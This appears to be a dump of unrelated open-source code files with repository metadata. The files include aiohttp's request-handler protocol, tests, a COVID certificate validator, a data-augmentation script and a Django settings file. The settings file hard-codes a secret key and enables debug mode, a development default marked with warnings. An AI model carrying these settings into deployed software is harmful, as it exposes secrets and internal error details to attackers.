ERROR = RawRequestMessage(
"UNKNOWN",
"/",
HttpVersion10,
{}, # type: ignore[arg-type]
{}, # type: ignore[arg-type]
True,
None,
False,
False,
yarl.URL("/"),
)
class RequestPayloadError(Exception):
"""Payload parsing error."""
class PayloadAccessError(Exception):
"""Payload was accessed after response was sent."""
@attr.s(auto_attribs=True, frozen=True, slots=True)
class _ErrInfo:
status: int
exc: BaseException
message: str
_MsgType = Tuple[Union[RawRequestMessage, _ErrInfo], StreamReader]
class RequestHandler(BaseProtocol):
"""HTTP protocol implementation.
RequestHandler handles incoming HTTP request. It reads request line,
request headers and request payload and calls handle_request() method.
By default it always returns with 404 response.
RequestHandler handles errors in incoming request, like bad
status line, bad headers or incomplete payload. If any error occurs,
connection gets closed.
keepalive_timeout -- number of seconds before closing
keep-alive connection
tcp_keepalive -- TCP keep-alive is on, default is on
debug -- enable debug mode
logger -- custom logger object
access_log_class -- custom class for access_logger
access_log -- custom logging object
access_log_format -- access log format string
loop -- Optional event loop
max_line_size -- Optional maximum header line size
max_field_size -- Optional maximum header field size
max_headers -- Optional maximum header size
"""
KEEPALIVE_RESCHEDULE_DELAY = 1
__slots__ = (
"_request_count",
"_keepalive",
"_manager",
"_request_handler",
"_request_factory",
"_tcp_keepalive",
"_keepalive_time",
"_keepalive_handle",
"_keepalive_timeout",
"_lingering_time",
"_messages",
"_message_tail",
"_waiter",
"_task_handler",
"_upgrade",
"_payload_parser",
"_request_parser",
"_reading_paused",
"logger",
"debug",
"access_log",
"access_logger",
"_close",
"_force_close",
"_current_request",
)
def __init__(
self,
manager: "Server",
*,
loop: asyncio.AbstractEventLoop,
keepalive_timeout: float = 75.0, # NGINX default is 75 secs
tcp_keepalive: bool = True,
logger: Logger = server_logger,
access_log_class: Type[AbstractAccessLogger] = AccessLogger,
access_log: Logger = access_logger,
access_log_format: str = AccessLogger.LOG_FORMAT,
debug: bool = False,
max_line_size: int = 8190,
max_headers: int = 32768,
max_field_size: int = 8190,
lingering_time: float = 10.0,
read_bufsize: int = 2 ** 16,
auto_decompress: bool = True,
):
super().__init__(loop)
self._request_count = 0
self._keepalive = False
self._current_request = None # type: Optional[BaseRequest]
self._manager = manager # type: Optional[Server]
self._request_handler: Optional[_RequestHandler] = manager.request_handler
self._request_factory: Optional[_RequestFactory] = manager.request_factory
self._tcp_keepalive = tcp_keepalive
# placeholder to be replaced on keepalive timeout setup
self._keepalive_time = 0.0
self._keepalive_handle = None # type: Optional[asyncio.Handle]
self._keepalive_timeout = keepalive_timeout
self._lingering_time = float(lingering_time)
self._messages: Deque[_MsgType] = deque()
self._message_tail = b""
self._waiter = None # type: Optional[asyncio.Future[None]]
self._task_handler = None # type: Optional[asyncio.Task[None]]
self._upgrade = False
self._payload_parser = None # type: Any
self._request_parser = HttpRequestParser(
self,
loop,
read_bufsize,
max_line_size=max_line_size,
max_field_size=max_field_size,
max_headers=max_headers,
payload_exception=RequestPayloadError,
auto_decompress=auto_decompress,
) # type: Optional[HttpRequestParser]
self.logger = logger
self.debug = debug
self.access_log = access_log
if access_log:
self.access_logger = access_log_class(
access_log, access_log_format
) # type: Optional[AbstractAccessLogger]
else:
self.access_logger = None
self._close = False
self._force_close = False
def __repr__(self) -> str:
return "<{} {}>".format(
self.__class__.__name__,
"connected" if self.transport is not None else "disconnected",
)
@property
def keepalive_timeout(self) -> float:
return self._keepalive_timeout
async def shutdown(self, timeout: Optional[float] = 15.0) -> None:
"""Do worker process exit preparations.
We need to clean up everything and stop accepting requests.
It is especially important for keep-alive connections.
"""
self._force_close = True
if self._keepalive_handle is not None:
self._keepalive_handle.cancel()
if self._waiter:
self._waiter.cancel()
# wait for handlers
with suppress(asyncio.CancelledError, asyncio.TimeoutError):
async with ceil_timeout(timeout):
if self._current_request is not None:
self._current_request._cancel(asyncio.CancelledError())
if self._task_handler is not None and not self._task_handler.done():
await self._task_handler
# force-close non-idle handler
if self._task_handler is not None:
self._task_handler.cancel()
if self.transport is not None:
self.transport.close()
self.transport = None
def connection_made(self, transport: asyncio.BaseTransport) -> None:
super().connection_made(transport)
real_transport = cast(asyncio.Transport, transport)
if self._tcp_keepalive:
tcp_keepalive(real_transport)
self._task_handler = self._loop.create_task(self.start())
assert self._manager is not None
self._manager.connection_made(self, real_transport)
def connection_lost(self, exc: Optional[BaseException]) -> None:
if self._manager is None:
return
self._manager.connection_lost(self, exc)
super().connection_lost(exc)
self._manager = None
self._force_close = True
self._request_factory = None
self._request_handler = None
self._request_parser = None
if self._keepalive_handle is not None:
self._keepalive_handle.cancel()
if self._current_request is not None:
if exc is None:
exc = ConnectionResetError("Connection lost")
self._current_request._cancel(exc)
if self._task_handler is not None:
self._task_handler.cancel()
if self._waiter is not None:
self._waiter.cancel()
self._task_handler = None
if self._payload_parser is not None:
self._payload_parser.feed_eof()
self._payload_parser = None
def set_parser(self, parser: Any) -> None:
# Actual type is WebReader
assert self._payload_parser is None
self._payload_parser = parser
if self._message_tail:
self._payload_parser.feed_data(self._message_tail)
self._message_tail = b""
def eof_received(self) -> None:
pass
def data_received(self, data: bytes) -> None:
if self._force_close or self._close:
return
# parse http messages
messages: Sequence[_MsgType]
if self._payload_parser is None and not self._upgrade:
assert self._request_parser is not None
try:
messages, upgraded, tail = self._request_parser.feed_data(data)
except HttpProcessingError as exc:
messages = [
(_ErrInfo(status=400, exc=exc, message=exc.message), EMPTY_PAYLOAD)
]
upgraded = False
tail = b""
for msg, payload in messages or ():
self._request_count += 1
self._messages.append((msg, payload))
waiter = self._waiter
if messages and waiter is not None and not waiter.done():
# don't set result twice
waiter.set_result(None)
self._upgrade = upgraded
if upgraded and tail:
self._message_tail = tail
# no parser, just store
elif self._payload_parser is None and self._upgrade and data:
self._message_tail += data
# feed payload
elif data:
eof, tail = self._payload_parser.feed_data(data)
if eof:
self.close()
def keep_alive(self, val: bool) -> None:
"""Set keep-alive connection mode.
:param bool val: new state.
"""
self._keepalive = val
if self._keepalive_handle:
self._keepalive_handle.cancel()
self._keepalive_handle = None
def close(self) -> None:
"""Close connection.
Stop accepting new pipelining messages and close
connection when handlers done processing messages.
"""
self._close = True
if self._waiter:
self._waiter.cancel()
def force_close(self) -> None:
"""Forcefully close connection."""
self._force_close = True
if self._waiter:
self._waiter.cancel()
if self.transport is not None:
self.transport.close()
self.transport = None
def log_access(
self, request: BaseRequest, response: StreamResponse, time: float
) -> None:
if self.access_logger is not None:
self.access_logger.log(request, response, self._loop.time() - time)
def log_debug(self, *args: Any, **kw: Any) -> None:
if self.debug:
self.logger.debug(*args, **kw)
def log_exception(self, *args: Any, **kw: Any) -> None:
self.logger.exception(*args, **kw)
def _process_keepalive(self) -> None:
if self._force_close or not self._keepalive:
return
next = self._keepalive_time + self._keepalive_timeout
# handler in idle state
if self._waiter:
if self._loop.time() > next:
self.force_close()
return
# not all request handlers are done,
# reschedule itself to next second
self._keepalive_handle = self._loop.call_later(
self.KEEPALIVE_RESCHEDULE_DELAY, self._process_keepalive
)
async def _handle_request(
self,
request: BaseRequest,
start_time: float,
request_handler: Callable[[BaseRequest], Awaitable[StreamResponse]],
) -> Tuple[StreamResponse, bool]:
assert self._request_handler is not None
try:
try:
self._current_request = request
resp = await request_handler(request)
finally:
self._current_request = None
except HTTPException as exc:
resp = exc
reset = await self.finish_response(request, resp, start_time)
except asyncio.CancelledError:
raise
except asyncio.TimeoutError as exc:
self.log_debug("Request handler timed out.", exc_info=exc)
resp = self.handle_error(request, 504)
reset = await self.finish_response(request, resp, start_time)
except Exception as exc:
resp = self.handle_error(request, 500, exc)
reset = await self.finish_response(request, resp, start_time)
else:
# Deprecation warning (See #2415)
if getattr(resp, "__http_exception__", False):
warnings.warn(
"returning HTTPException object is deprecated "
"(#2415) and will be removed, "
"please raise the exception instead",
DeprecationWarning,
)
reset = await self.finish_response(request, resp, start_time)
return resp, reset
async def start(self) -> None:
"""Process incoming request.
It reads request line, request headers and request payload, then
calls handle_request() method. Subclass has to override
handle_request(). start() handles various exceptions in request
or response handling. Connection is being closed always unless
keep_alive(True) specified.
"""
loop = self._loop
handler = self._task_handler
assert handler is not None
manager = self._manager
assert manager is not None
keepalive_timeout = self._keepalive_timeout
resp = None
assert self._request_factory is not None
assert self._request_handler is not None
while not self._force_close:
if not self._messages:
try:
# wait for next request
self._waiter = loop.create_future()
await self._waiter
except asyncio.CancelledError:
break
finally:
self._waiter = None
message, payload = self._messages.popleft()
start = loop.time()
manager.requests_count += 1
writer = StreamWriter(self, loop)
if isinstance(message, _ErrInfo):
# make request_factory work
request_handler = self._make_error_handler(message)
message = ERROR
else:
request_handler = self._request_handler
request = self._request_factory(message, payload, self, writer, handler)
try:
# a new task is used for copy context vars (#3406)
task = self._loop.create_task(
self._handle_request(request, start, request_handler)
)
try:
resp, reset = await task
except (asyncio.CancelledError, ConnectionError):
self.log_debug("Ignored premature client disconnection")
break
# Drop the processed task from asyncio.Task.all_tasks() early
del task
if reset:
self.log_debug("Ignored premature client disconnection 2")
break
# notify server about keep-alive
self._keepalive = bool(resp.keep_alive)
# check payload
if not payload.is_eof():
lingering_time = self._lingering_time
if not self._force_close and lingering_time:
self.log_debug(
"Start lingering close timer for %s sec.", lingering_time
)
now = loop.time()
end_t = now + lingering_time
with suppress(asyncio.TimeoutError, asyncio.CancelledError):
while not payload.is_eof() and now < end_t:
async with ceil_timeout(end_t - now):
# read and ignore
await payload.readany()
now = loop.time()
# if payload still uncompleted
if not payload.is_eof() and not self._force_close:
self.log_debug("Uncompleted request.")
self.close()
payload.set_exception(PayloadAccessError())
except asyncio.CancelledError:
self.log_debug("Ignored premature client disconnection ")
break
except RuntimeError as exc:
if self.debug:
self.log_exception("Unhandled runtime exception", exc_info=exc)
self.force_close()
except Exception as exc:
self.log_exception("Unhandled exception", exc_info=exc)
self.force_close()
finally:
if self.transport is None and resp is not None:
self.log_debug("Ignored premature client disconnection.")
elif not self._force_close:
if self._keepalive and not self._close:
# start keep-alive timer
if keepalive_timeout is not None:
now = self._loop.time()
self._keepalive_time = now
if self._keepalive_handle is None:
self._keepalive_handle = loop.call_at(
now + keepalive_timeout, self._process_keepalive
)
else:
break
# remove handler, close transport if no handlers left
if not self._force_close:
self._task_handler = None
if self.transport is not None:
self.transport.close()
async def finish_response(
self, request: BaseRequest, resp: StreamResponse, start_time: float
) -> bool:
"""Prepare the response and write_eof, then log access.
This has to
be called within the context of any exception so the access logger
can get exception information. Returns True if the client disconnects
prematurely.
"""
if self._request_parser is not None:
self._request_parser.set_upgraded(False)
self._upgrade = False
if self._message_tail:
self._request_parser.feed_data(self._message_tail)
self._message_tail = b""
try:
prepare_meth = resp.prepare
except AttributeError:
if resp is None:
raise RuntimeError("Missing return " "statement on request handler")
else:
raise RuntimeError(
"Web-handler should return "
"a response instance, "
"got {!r}".format(resp)
)
try:
await prepare_meth(request)
await resp.write_eof()
except ConnectionError:
self.log_access(request, resp, start_time)
return True
else:
self.log_access(request, resp, start_time)
return False
def handle_error(
self,
request: BaseRequest,
status: int = 500,
exc: Optional[BaseException] = None,
message: Optional[str] = None,
) -> StreamResponse:
"""Handle errors.
Returns HTTP response with specific status code. Logs additional
information. It always closes current connection.
"""
self.log_exception("Error handling request", exc_info=exc)
# some data already got sent, connection is broken
if request.writer.output_size > 0:
raise ConnectionError(
"Response is sent already, cannot send another response "
"with the error message"
)
ct = "text/plain"
if status == HTTPStatus.INTERNAL_SERVER_ERROR:
title = "{0.value} {0.phrase}".format(HTTPStatus.INTERNAL_SERVER_ERROR)
msg = HTTPStatus.INTERNAL_SERVER_ERROR.description
tb = None
if self.debug:
with suppress(Exception):
tb = traceback.format_exc()
if "text/html" in request.headers.get("Accept", ""):
if tb:
tb = html_escape(tb)
msg = f"<h2>Traceback:</h2>\n<pre>{tb}</pre>"
message = (
"<html><head>"
"<title>{title}</title>"
"</head><body>\n<h1>{title}</h1>"
"\n{msg}\n</body></html>\n"
).format(title=title, msg=msg)
ct = "text/html"
else:
if tb:
msg = tb
message = title + "\n\n" + msg
resp = Response(status=status, text=message, content_type=ct)
resp.force_close()
return resp
def _make_error_handler(
self, err_info: _ErrInfo
) -> Callable[[BaseRequest], Awaitable[StreamResponse]]:
async def handler(request: BaseRequest) -> StreamResponse:
return self.handle_error(
request, err_info.status, err_info.exc, err_info.message
)
return handler
|
[
"noreply@github.com"
] |
zdar.noreply@github.com
|
3abdf84cc22cefb42af6f5fd17b8ededadeb3779
|
fc070dfc9182b7f3a923e2b22331112c01bc8970
|
/21-30/30.py
|
66dd4eb1d8af8f9ebfcc9ced98c6c30be7ad3c02
|
[] |
no_license
|
sucman/Python100
|
346ddd11e4387ef3fac14f9180c1607bf4573afc
|
6453455f9029cb86953fc70f5bcf5a8d84489673
|
refs/heads/master
| 2020-05-04T15:29:00.617638
| 2019-04-03T08:37:43
| 2019-04-03T08:37:59
| 179,242,746
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 399
|
py
|
# -*- coding:utf-8 -*-
'''
Read a 5-digit number and decide whether it is a palindrome: 12321 is a palindrome because the ones digit equals the ten-thousands digit and the tens digit equals the thousands digit.
'''
a = int(raw_input("Enter a number: "))
x = str(a)
flag = True
for i in range(len(x) / 2):
if x[i] != x[-i - 1]:
flag = False
break
if flag:
print "%d is a palindrome." % a
else:
print "%d is not a palindrome." % a
|
[
"https://github.com/sucman/AppiumTest.git"
] |
https://github.com/sucman/AppiumTest.git
|
3f0b3d42f816e833e4bab099a8f4bf1c4dd007e3
|
3c7057226c7bb01cd493cde5742b3979cf030f94
|
/tests/unit/client/test_auth_tracker.py
|
9857bf2e6d080b102db25cb8cb9a8c3ab9e75097
|
[
"Apache-2.0"
] |
permissive
|
sharadc2001/lmctl
|
2d047f776d1bbee811801ccc5454a097b1484841
|
a220a3abeef5fc1f7c0a9410524625c2ff895a0a
|
refs/heads/master
| 2023-05-27T06:14:49.425793
| 2021-04-29T20:08:52
| 2021-04-29T20:08:52
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,084
|
py
|
import unittest
import time
from lmctl.client.auth_tracker import AuthTracker
class TestAuthTracker(unittest.TestCase):
def test_accept_auth_response(self):
tracker = AuthTracker()
tracker.accept_auth_response({
'accessToken': '123',
'expiresIn': 60,
})
self.assertEqual(tracker.current_access_token,'123')
self.assertIsNotNone(tracker.time_of_auth)
def test_has_access_expired_when_no_token(self):
tracker = AuthTracker()
self.assertTrue(tracker.has_access_expired)
def test_has_access_expired(self):
tracker = AuthTracker()
tracker.accept_auth_response({
'accessToken': '123',
'expiresIn': 0.2,
})
time.sleep(0.3)
self.assertTrue(tracker.has_access_expired)
def test_has_access_expired_false_when_time_not_passed(self):
tracker = AuthTracker()
tracker.accept_auth_response({
'accessToken': '123',
'expiresIn': 25,
})
self.assertFalse(tracker.has_access_expired)
|
[
"daniel.vaccaro-senna@ibm.com"
] |
daniel.vaccaro-senna@ibm.com
|
79021698e963ef29669a46525cd80edf60c44917
|
afdcdaabecd85a2f237a40c57e52c5b2651ee4ac
|
/textutils/settings.py
|
63d106afb62d18c3734b0ac6d4372bbe35795c05
|
[] |
no_license
|
amit631308/TextUtils
|
4ec99b4763ca06c2a921df8aec6c8d593ed523bf
|
d4c3f788de73c95f226299f1a881ebab2eb905be
|
refs/heads/master
| 2020-12-12T12:43:36.792812
| 2020-01-15T17:16:56
| 2020-01-15T17:16:56
| 234,129,046
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,106
|
py
|
"""
Django settings for textutils project.
Generated by 'django-admin startproject' using Django 2.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'q!s4w07oj9%id!60pefllb47a-f1homsb_$fk%##_0zu^ak(fc'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'textutils.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': ['templates'],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'textutils.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
|
[
"you@example.com"
] |
you@example.com
|
4853d7a33e778004d0fcfc54df63a2f2c44f64de
|
2ac6af36f5412d3407a8bea8abee91e866559df3
|
/python/most_digits.py
|
8281e1a35b15bddc854093e3001046f7eb7b17a1
|
[] |
no_license
|
fzramos/brainteasers
|
128a6bfe26dd359135576cc838aa178f5f74bc3f
|
c7a2a3b440e6cd9eb7271dccee30af2fd51a1044
|
refs/heads/master
| 2023-03-31T04:00:11.701374
| 2021-04-02T17:17:01
| 2021-04-02T17:17:01
| 331,523,790
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 417
|
py
|
"""
Find the number with the most digits.
If two numbers in the argument array have the same number of digits, return the first one in the array.
"""
# quick first attempt
def find_longest(arr):
strs = list(map(str, arr))
# without key max would see string 4 as greater than string 1000
return int(max(strs, key = len))
def find_longest_best(arr):
return max(arr, key=lambda x: len(str(x)))
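# Example: find_longest([3, 40, 1000, 55]) == 1000; with a tie in digit count,
# find_longest([9, 12, 88]) == 12 because max() keeps the first maximal element.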
|
[
"64625115+fzramos@users.noreply.github.com"
] |
64625115+fzramos@users.noreply.github.com
|
200c79377301477c6cc35c49fbf5ab5eecc2f49c
|
8e35a152a91fe484eb971c597964132b968bf0f7
|
/validate_hcert.py
|
bf7ed9eb2df1797832a0e29eaa08fc35e80a6cfe
|
[] |
no_license
|
Totoro2205/eu-dcc-diagnostics
|
540354e1157e5c5ece1b226dfa5a39a30cdafafa
|
0b82b043689ab7ada82072d3221cf123237ba3c9
|
refs/heads/master
| 2023-09-01T16:06:37.392438
| 2021-10-27T15:02:46
| 2021-10-27T15:02:46
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,931
|
py
|
#!/bin/env python3.9
import sys
from base45 import b45decode
import zlib
from cbor2 import loads
from cose.messages import Sign1Message
from classes.SchemaValidator import SchemaValidator
from classes.SignatureValidator import SignatureValidator
from classes.TrustList import TrustList, UnknownKidError
# Initialize components
SCHEMA_VALIDATOR = SchemaValidator.create()
SIGNATURE_VALIDATOR = SignatureValidator(TrustList.load("trustlist.json"))
sys.stdin.reconfigure(encoding='utf-8')
def unpack_qr(qr_text):
compressed_bytes = b45decode(qr_text[4:])
print("..b45-decode OK")
cose_bytes = zlib.decompress(compressed_bytes)
print("..zlib.decompress OK")
cose_message = Sign1Message.decode(cose_bytes)
print("..cose.decode OK")
cbor_message = loads(cose_message.payload)
print("..cbor.load OK")
print(cbor_message)
return {
"COSE": cose_bytes.hex(),
"JSON": cbor_message[-260][1]
}
for line in sys.stdin:
data = line.rstrip("\r\n").rstrip("\n")
print()
print(f"Validating: [{data}]")
try:
json = unpack_qr(data)
# Signature
result = SIGNATURE_VALIDATOR.validate(bytes.fromhex(json["COSE"]))
if result["valid"]:
print("Successfully validated signature!")
else:
print("Signature validation failed!")
# Schema
json_payload = json["JSON"]
schema_ver = json_payload['ver']
result = SCHEMA_VALIDATOR.validate(json_payload)
if result["valid"]:
print(f"Successfully validated schema! The file conforms to schema { schema_ver }")
else:
print(f"Schema validation failed! The file does not conform to schema { schema_ver }")
except UnknownKidError as error:
print("Error! KID not found")
print(error)
except Exception as error:
print("Error! Something went very wrong!")
print(error)
|
[
"ryan@seldonplan.com"
] |
ryan@seldonplan.com
|
10cb9613d04d8eda241c65c5cdd1b61e4190ce71
|
ac853361fa5faed26a9725d2b76c5e6ed5b83a9f
|
/ppd_rank1/data_aug.py
|
3ab199878e8237706d194911966cbc138f8fb750
|
[] |
no_license
|
jnuCompetition/chip2018
|
1637483fcf116157c08fca691639b0b277c1c1d6
|
0621a391a8eead6251bb8adc610a7905ba6c20cd
|
refs/heads/master
| 2020-04-08T16:00:25.102851
| 2018-11-28T12:23:24
| 2018-11-28T12:23:24
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,443
|
py
|
#/usr/bin/env python
#coding=utf-8
import sys,math
import numpy as np
import pandas as pd
from sklearn.model_selection import train_test_split, StratifiedKFold
clusterindex = 0
questionindex = {}
clusterindexsim = {}
clusterinfo = {}
questionfalse = {}
count = 0
limit = 2000000
for line in open('../input/train.csv'):
if not line:
continue
array = line.strip().split(',')
if array[0] == 'label':
continue
if count < limit:
if questionindex.get(array[1],-1)==-1:
questionindex[array[1]] = clusterindex
clusterinfo[clusterindex] = clusterinfo.get(clusterindex,[])
clusterinfo[clusterindex].append(array[1])
clusterindex += 1
if questionindex.get(array[2],-1)==-1:
if array[0] == '1':
questionindex[array[2]] = questionindex[array[1]]
clusterinfo[questionindex[array[1]]].append(array[2])
else:
questionindex[array[2]] = clusterindex
clusterinfo[clusterindex] = clusterinfo.get(clusterindex, [])
clusterinfo[clusterindex].append(array[2])
clusterindex += 1
if array[0] == '0':
assert questionindex[array[2]] != questionindex[array[1]]
else:
if questionindex[array[2]] != questionindex[array[1]]:
clusterindexsim[questionindex[array[2]]] = clusterindexsim.get(questionindex[array[2]],[])
clusterindexsim[questionindex[array[2]]].append(questionindex[array[1]])
clusterindexsim[questionindex[array[1]]] = clusterindexsim.get(questionindex[array[1]], [])
clusterindexsim[questionindex[array[1]]].append(questionindex[array[2]])
count+=1
f = open('../input/questionclusterdebug','w')
# f = open('./debug','w')
index2 = set()
count = 0
questionindex = {}
clusterinfo2 = {}
for k,v in clusterinfo.items():
ids = set()
res = set()
index1 = set([k])
while len(index1 - index2) > 0:
temp = set()
for k2 in index1 - index2:
ids.add(k2)
index2.add(k2)
res = res | set(clusterinfo[k2])
# for k3 in clusterindexsim.get(k2,[]):
temp = temp | set(clusterindexsim.get(k2,[]))
index1 = index1 | temp
if len(res) > 0:
# print >> f,str(count) + "|" + ",".join(list(res))
print(str(count) + "|" + ",".join(list(res)),file=f)
clusterinfo2[count] = ",".join(list(res))
for question in res:
questionindex[question] = count
count += 1
# print s
count = 0
clusternotconnect = {}
pairsintrain = set()
for line in open('../input/train.csv'):
if not line:
continue
array = line.strip().split(',')
if array[0] == 'label':
continue
if count < limit:
if array[0] == '0':
clusternotconnect[questionindex[array[2]]] = clusternotconnect.get(questionindex[array[2]],set())
clusternotconnect[questionindex[array[2]]].add(questionindex[array[1]])
clusternotconnect[questionindex[array[1]]] = clusternotconnect.get(questionindex[array[1]],set())
clusternotconnect[questionindex[array[1]]].add(questionindex[array[2]])
pairsintrain.add(array[1] + array[2])
pairsintrain.add(array[2] + array[1])
count += 1
f = open('../input/questioncluster','w')
for k,v in clusterinfo2.items():
# print >> f, str(k) + "|" + v + "|" + ",".join(map(str, list(clusternotconnect.get(k,set())))) # clusterid|questions|sameid|falseid
    print(str(k) + "|" + v + "|" + ",".join(map(str, list(clusternotconnect.get(k, set())))), file=f)
f.close()
import random
import itertools
clusterindexlist = []
questionindex = {}
clusterinfo = {}
allquestion = set()
clusternotconnect = {}
count = 0
for line in open('../input/questioncluster'):
if not line:
continue
array = line.strip().split('|')
id = array[0]
questions = array[1].split(',')
clusterinfo[id] = questions
clusterindexlist.append(id)
for question in questions:
allquestion.add(question)
questionindex[question] = id
clusternotconnect[id] = array[2].split(',')
questioncountpos = {}
questioncountneg = {}
countt = 0
countf = 0
print(len(allquestion))
# print(len(filter(lambda x:len(x[1]) > 2,clusterinfo.items())))
f2 = open('../input/train_remix.csv','w')
# print >>f2,"label,q1,q2"
print("label,q1,q2",file=f2)
for id,l in clusterinfo.items():
limit = 0
res = []
if len(l) > 2:
otherquestion = list(allquestion - set(l))
comb = [w for w in itertools.combinations(l, 2)]
        # integer division so random.sample receives an int sample size
        limit = min(int(len(l) * 8), max(1, len(l) * (len(l) - 1) // 3))
        res = random.sample(comb, min(limit + 10, max(1, len(l) * (len(l) - 1) // 3)))
count = 0
for k in res:
if k[0] + k[1] not in pairsintrain:
# print >> f2, "1," + k[0] + "," + k[1]
print("1," + k[0] + "," + k[1],file=f2)
count += 1
countt += 1
# else:
# continue
if random.random() > 0.4:
q1 = k[0]
q2 = random.sample(otherquestion,1)
if q2[0] + q1 not in pairsintrain:
# print >> f2, "0," + q2[0] + "," + q1
print("0," + q2[0] + "," + q1,file=f2)
countf+=1
if random.random() > 0.4:
q1 = k[1]
q2 = random.sample(otherquestion,1)
if q1 + q2[0] not in pairsintrain:
# print >> f2, "0," + q1 + "," + q2[0]
print("0," + q1 + "," + q2[0], file=f2)
countf+=1
if count == limit:
break
print(countt,countf)
f2.close()
f = open('../input/test_fix.csv', 'w')
# print >> f, "q1,q2,oldindex"
print("q1,q2,oldindex",file=f)
count = 0
singlecount = 0
twocount = 0
fixcount = 0
for line in open('../input/test.csv'):
if not line:
continue
array = line.strip().split(',')
if array[0] == 'q1':
continue
# label = array[0]
q2 = array[1]
q1 = array[0]
q1l = []
q2l = []
if questionindex.get(q1,-1) != -1:
q1l = random.sample(clusterinfo[questionindex[q1]],min(len(clusterinfo[questionindex[q1]]),10))
if questionindex.get(q2,-1) != -1:
q2l = random.sample(clusterinfo[questionindex[q2]],min(len(clusterinfo[questionindex[q2]]),10))
if len(q1l) <= 1:
singlecount += 1
if len(q2l) <= 1:
singlecount += 1
q1l = set(q1l) - set([q1])
q2l = set(q2l) - set([q2])
# print >>f, q1 + ',' + q2 + "," + str(count)
print(q1 + ',' + q2 + "," + str(count),file=f)
for k2 in random.sample(q2l,min(len(q2l),10)):
if random.random() > 0.5:
# print >>f, q1 + ',' + k2 + "," + str(count)
print(q1 + ',' + k2 + "," + str(count), file=f)
else:
# print >> f,k2 + ',' + q1 + "," + str(count)
print(k2 + ',' + q1 + "," + str(count), file=f)
for k1 in random.sample(q1l,min(len(q1l),10)):
if random.random() > 0.5:
# print >>f, k1 + ',' + q2 + "," + str(count)
print(k1 + ',' + q2 + "," + str(count),file=f)
else:
# print >>f, q2 + ',' + k1 + "," + str(count)
print(q2 + ',' + k1 + "," + str(count), file=f)
count += 1
|
[
"zhaoyuansir@163.com"
] |
zhaoyuansir@163.com
|
55a530839c8082968273f2a09b8b4ddf21380663
|
646a5080f2e4ae87c90978282844a9b314367088
|
/camera_ws/catkin_ws/build/image_pipeline/camera_calibration/catkin_generated/pkg.develspace.context.pc.py
|
2cdfae278109b18e1b22d4a786fc4a2f4610699a
|
[] |
no_license
|
0000duck/METR4202-T6
|
eb72a064fafc13b11c833a25802fb9c74472d010
|
fa7ef8e9a2e443a18df9ab214619b5458b9edd67
|
refs/heads/main
| 2023-08-16T07:24:26.877881
| 2021-10-25T04:09:29
| 2021-10-25T04:09:29
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 404
|
py
|
# generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "camera_calibration"
PROJECT_SPACE_DIR = "/home/michael/METR4202-T6/camera_ws/catkin_ws/devel"
PROJECT_VERSION = "1.15.3"
|
[
"m.leonard@uqconnect.edu.au"
] |
m.leonard@uqconnect.edu.au
|
400b4e2d59da265875e51847c2fd51ad8e9da2ea
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_200/4699.py
|
47f6b945465c705d69be01ee6ea4d93ff6faac1f
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460
| 2018-10-14T10:12:47
| 2018-10-14T10:12:47
| null | 0
| 0
| null | null | null | null |
